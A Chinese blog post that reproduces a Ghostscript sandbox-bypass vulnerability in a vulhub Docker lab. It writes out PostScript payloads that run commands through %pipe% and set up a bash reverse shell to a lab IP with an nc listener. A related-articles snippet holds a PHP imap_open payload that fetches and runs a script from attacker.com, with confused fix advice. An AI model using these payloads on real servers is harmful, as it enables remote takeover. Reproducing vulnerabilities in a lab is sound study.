漏洞复现笔记(CVE-2018-19475)

最新推荐文章于 2024-07-16 12:22:44 发布
最新推荐文章于 2024-07-16 12:22:44 发布
阅读量270 收藏 5
点赞数 2
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72760965/article/details/139678828
版权

漏洞描述

8月21号,Tavis 0rmandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞

GhostScript 被许多图片处理库所使用,如 lmageMagick、 Pthon PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

影响范围

Ghostscript 9.24 之前版本

复现过程

这里使用vulhub搭建环境

进入靶场

开启靶场

  • docker-compose up -d

查看靶场环境

  • docker ps

访问url

  • youIP:8080
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file

提交poc

查看容器是否生成文件

  • docker-compose exe web bash

退出容器

  • exit

反弹shell

首先生成shell文件

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%echo 'bash -i >& /dev/tcp/192.168.198.129/6666 0>&1' >> /tmp/shell.sh) (w) file

提交

其次给shell文件执行权限

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%chmod +x /tmp/shell.sh) (w) file

提交

开监听端口

  • nc -lvvp 6666

最后执行反弹shell命令

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%/bin/bash /tmp/shell.sh) (w) file

成功反弹shell

关闭靶场

  • docker-compose down
纪瑾
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenSSH 用户名枚举漏洞复现CVE-2018-15473)
千寻的博客
03-06 2715
文章目录漏洞名称漏洞编号漏洞描述影响版本环境搭建漏洞复现修复建议学习笔记链接摘抄 漏洞名称 OpenSSH 用户名枚举漏洞 漏洞编号 CVE-2018-15473 漏洞描述 OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用
WordPress插件File-Manager任意文件上传漏洞复现CVE-2020-25213)
千寻的博客
01-26 1859
文章目录漏洞名称漏洞编号插件介绍漏洞描述影响版本实验环境及准备第一步 搭建wordpress第二步 下载插件,导入目录中第三步 查看漏洞复现步骤第一步 安装模块 jq 模块第二步 检查漏洞是否存在第三步 访问上传的hello.php第四步 上传shell.php修复建议参考链接摘抄 漏洞名称 WordPress的插件 wp-file-manager 文件上传漏洞 漏洞编号 CVE-2020-25213 插件介绍 WP-file-manager是一个旨在帮助WordPress管理员管理其站点上的文
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628 CVE-2023-21839复现)_weblogic payload
2401_83974117的博客
04-18 503
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
漏洞复现---V8漏洞CVE-2018-17463分析与复现
zkaqlaoniao的博客
11-23 137
V8的整个compiler pipeline可以用下图表示,一段JS代码首先被转换成AST,然后在Ignition中解析并转换成V8的字节码,当字节码在执行JS函数的过程中,会收集profiling和feedback数据,这些信息会被Turbofan用来优化生成机器码。
漏洞复现】Weblogic 任意文件上传漏洞(CVE-2018-2894)
m0_69043895的博客
04-25 443
Oracle在7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page在"生产模式"下默认不开启,所以该漏洞有一定限制,利用该漏洞,可以上传任意.jsp文件,进而获取服务器权限。
漏洞复现笔记CVE-2018-16509)
weixin_72760965的博客
06-14 157
Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。在文件上传过程中,有可能会用GhostScript来处理图片。Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大。(将id这个命令写入到success这个文件中,并且查看这个文件)这里使用的是靶场自带的poc。
CVE-2021-3156 漏洞复现笔记
热门推荐
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
Codeql复现CVE-2018-11776学习笔记
向阳-Y.的博客
03-11 377
isAdditionalFlowStep用于衔接一些没匹配上的数据流,简单来说可能有如下情况,在调用bar()时没有提前调用foo(),导致数据流并不认为foo到bar是连通的所以默认DataFlow::Configuration是不包括这个流步骤的,因为也不能确定bar()中对this.field的访问总是被污染的,但是在漏洞挖掘中,包含这种形式的调用是非常有意义的。TaintTracking::localTaintStep(node1, node2) 测试node1到node2的连通性。
CVE-2018-15473(OpenSSH用户枚举漏洞
1stPeak's Blog
06-07 2611
CVE-2018-15473复现笔记 影响版本 该影响自1999年以来至今年7.7版本中所有版本,远程攻击者可利用漏洞猜测在OpenSSH服务器上注册的用户名 POC链接 https://github.com/1stPeak/CVE-2018-15473 POC环境配置 git clone hhttps://github.com/1stPeak/CVE-2018-15473.git cd CVE-2018-15473 #注意:如果您在kali上安装,则可以跳过pip安装;paramiko已经在那里。 .
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
防御笔记第七天(时需更新)
最新发布
weixin_63264424的博客
07-16 498
HRP在进行双机热备时,还有一个要求,两台热设备之间,必须拥有一条链路,用来同步信息,并且,这条链路必须是三层链路---这两条路在进行数据传输时,不受安全策略的影响,(注意,如果心跳线是直连的,则不受安全策略的影响,但是中间有中继设备,即非直连场景,则需要配置安全策略)----心跳线----VGMP发送的报文也是通过心跳线传输的。配置信息---(接口IP地址,路由地址)-----hrp不能同步基本的接口和路由信息,安全策略和NAT策略……状态信息-----会话表,server-map,黑名单和白名单等等。
微信小程序开发笔记之”表单读不出数据“解决指南
qq_46396470的博客
07-12 329
脑瓜子好了后,忘记了表单控件必须要加上。提交后打印的字典是空的,卡了十几分钟。
mysql笔记1
m0_62975692的博客
07-11 403
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值